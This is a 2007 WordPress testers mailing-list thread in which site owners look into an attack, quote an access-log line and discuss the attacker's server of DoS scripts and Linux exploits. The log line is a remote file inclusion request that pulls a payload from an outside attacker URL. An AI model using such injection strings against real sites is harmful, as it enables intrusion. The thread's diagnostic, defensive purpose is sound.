[wp-testers] More on hack...
Simon Hollingshead
simon.hollingshead at googlemail.com
Sat Dec 29 00:07:35 GMT 2007
Also, whilst looking at that, were you not hit by this exploit either:
http://www.milw0rm.com/exploits/4721
On Dec 28, 2007 11:37 PM, DD32 <wordpress at dd32.id.au> wrote:
> On Sat, 29 Dec 2007 10:23:12 +1100, Simon Hollingshead <
> simon.hollingshead at googlemail.com> wrote:
>
> > Now I'm no expert but by the contents of http://gw-gold.net/xpl/bot.c
> > It seems like they endorse and hold DoS scripts on their server.
>
> Looking around, I've seen a few others refering to the id.txt file and
> access attempts to WP, All of them are located on different servers, and the
> file no longer exists, My guess is that they're just using random hosts
> which have been exploited, rather than using servers they actually own.
> It also appears to be mainly targetting specific WP plugins -- Most likely
> older versions, And several other common applications which have known
> vulnerabilities in older versions.
>
> > There is also a GZipped Tarball file within the xpl directory but I
> don't
> > know if I should risk opening it. They do DoS, what's to say they don't
> > also hold virii?
>
> Theres 2 dozen compiled Linux exploits, and the C code for "Gpsd remote
> format string exploit" and "expand_stack SMP race local root exploit" which
> would be POC's
> The naming of the compiled files is "woot" "pwned" "own" "mailbomb" ..all
> useless names :)
>
> >
> > On Dec 28, 2007 11:07 PM, cpa31335 <tpblogeditor at gmail.com> wrote:
> >
> >> here's a snippet of my Hosts log file:
> >>
> >> 4.66.112.173 <http://64.66.112.173/> - - [17/Dec/2007:04:00:44 -0800]
> "GET
> >> /?q=node/2//?q=nodehttp://gw-gold.net/xpl/id.txt
> >>
> >> that is what was used. I also sent this to security at wordpress.org
> >>
> >> nice.
> >>
> >> 8-(
> >>
> >>
> >>
> >> --
> >> -Chuck Adkins
> >> Owner and Publisher
> >> The Populist News Service
> >> http://www.thepopulistblog.com
> >> Personal Blog:
> >> http://www.thepopulistblog.com/wordpress
> >> _______________________________________________
> >> wp-testers mailing list
> >> wp-testers at lists.automattic.com
> >> http://lists.automattic.com/mailman/listinfo/wp-testers
> >>
> > _______________________________________________
> > wp-testers mailing list
> > wp-testers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-testers
> >
>
>
>
> _______________________________________________
> wp-testers mailing list
> wp-testers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-testers
>
More information about the wp-testers
mailing list